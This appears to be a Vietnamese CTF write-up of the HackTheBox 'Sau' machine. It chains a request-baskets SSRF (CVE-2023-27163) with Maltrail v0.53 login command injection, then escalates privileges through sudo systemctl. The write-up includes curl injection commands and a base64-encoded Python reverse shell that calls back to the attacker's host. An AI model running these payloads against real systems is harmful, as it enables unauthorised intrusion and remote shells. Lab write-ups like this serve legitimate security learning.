Home Sau HTB Writeup - Hackthebox
Post
Cancel

Sau HTB Writeup - Hackthebox

1
nmap -p- -sCV -A 10.10.11.224 -oN Sau

Sau-HTB

Có 2 port đang mở

  • 22/tcp ssh
  • 55555/tcp

Và 2 port đang bị chặn: 80/tcp và 8338/tcp.

http://10.10.11.224:55555

http://10.10.11.224:55555

port 55555 đang chạy 1 dịch vụ web, cụ thể 1 trang Request Baskets để bắt các gói tin http.

Sau-HTB

Trang này sử dụng request-baskets version 1.2.1. Search google phát hiện cho đến v1.2.1 thì có tồn tại lỗ hổng SSRF (CVE-2023-27163)

Ban đầu, nmap quét được 2 cổng 80 và 8338 đã bị chặn, khả năng đây là dịch vụ nội bộ nên tui sẽ post /api/baskets/ với payload sau:

Sau-HTB

Truy cập baskets với payload vừa tạo, sau đó nó sẽ forward tới port 80.

Sau-HTB

eoz xấu tệ hại, có lẽ js css linking bị lỗi. Không quan tâm lắm, thứ chúng ta cần quan tâm là cái mũi tên góc trái phía dưới kìa. Là Maltrail (v0.53), có lỗ hổng cực kì nghiêm trọng, tại trang login có thể khai thác RCE thông qua param username

PoC: https://github.com/spookier/Maltrail-v0.53-Exploit

1
curl -X POST 'http://10.10.11.224:55555/lewlew/login' --data 'username=;`curl 10.10.14.42:4444 `'

Sau-HTB

Vậy là đã chứng minh được code của mình được inject và thực thi thành công. Tiếp theo, tạo payload reverse shell và inject.

Sau-HTB

1
curl -X POST 'http://10.10.11.224:55555/lewlew/login' --data 'username=;`echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuNDIiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=" | base64 -d | sh`'

Sau-HTB

Leo Root

1
sudo -l

Sau-HTB

Chạy lệnh với sudo

1
sudo /usr/bin/systemctl status trail.service

Sau-HTB

output có vẻ giống với lệnh less

Sau-HTB

Sau-HTB

This post is licensed under CC BY 4.0 by the author.

[WRITEUP] Neonify - COOKIE ARENA

CozyHosting Writeup - Hackthebox